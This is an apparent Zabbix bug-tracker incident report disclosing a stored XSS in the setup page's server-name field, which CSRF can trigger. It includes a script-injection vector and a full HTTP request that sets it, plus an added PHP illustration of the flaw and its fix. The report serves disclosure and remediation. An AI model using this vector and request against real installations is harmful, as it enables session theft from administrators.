Details

    • Type: Incident report
    • Status: Closed
    • Priority: Trivial
    • Resolution: Fixed
    • Affects Version/s: 3.2.0
    • Fix Version/s: 3.4.0alpha1
    • Component/s: Frontend (F)
    • Labels:
    • Environment:
      LAMP

      Description

      There is a stored XSS vulnerability in the Server name parameter.

      This parameter is specified during the initial setup, but since /zabbix/setup.php is still available after the setup and there is no protection against CSRF attacks, a malicious attacker could convince an Admin to execute the script via a CSRF attack.

      The vulnerable parameter is zbx_server_name.
      Example vector: </title><script>alert(document.cookie)</script>

      An example request for setting up the Server name will be:
      POST /zabbix/setup.php HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://127.0.0.1/zabbix/setup.php
      Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 184

      sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step
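
The two defects the report describes (the stored value reaching the page unencoded, and the setup POST being accepted without a CSRF check) are shown below as an added example next to their fixes. It is not Zabbix source code. The function names, the `csrf_token` field and the page-title layout are hypothetical, and the assumption that the server name is rendered inside `<title>` is taken from the `</title>` at the start of the reported vector.

```php
<?php
// Added illustration, not Zabbix code. All function names are hypothetical.

// Constructed sample input: the example vector quoted in the report.
$stored = '</title><script>alert(document.cookie)</script>';

// Before: the stored server name is concatenated into the page as-is, so
// "</title>" closes the element and the remainder is parsed as markup.
function render_title_unsafe(string $serverName): string
{
    return '<title>' . $serverName . ': Dashboard</title>';
}

// After: encode for the HTML context at output time, every time the value
// is rendered, regardless of how it was validated when it was stored.
function render_title_safe(string $serverName): string
{
    $encoded = htmlspecialchars($serverName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<title>' . $encoded . ': Dashboard</title>';
}

// CSRF check for the state-changing setup POST: the request must carry a
// token bound to the session, compared in constant time. The 'csrf_token'
// field name is an assumption made for this example.
function csrf_token_valid(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

echo render_title_unsafe($stored), PHP_EOL;
echo render_title_safe($stored), PHP_EOL;

// Constructed session state for the demonstration.
$session = ['csrf_token' => bin2hex(random_bytes(16))];

// A cross-site form post cannot read the session token, so it arrives without one.
$crossSitePost = ['zbx_server_name' => $stored];
// A form served by the application itself echoes the token back.
$sameSitePost  = ['zbx_server_name' => 'Zabbix', 'csrf_token' => $session['csrf_token']];

var_dump(csrf_token_valid($session, $crossSitePost));
var_dump(csrf_token_valid($session, $sameSitePost));
```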

            People

            • Assignee:
              Unassigned
            • Reporter:
              osakaaa Andrey Plastunov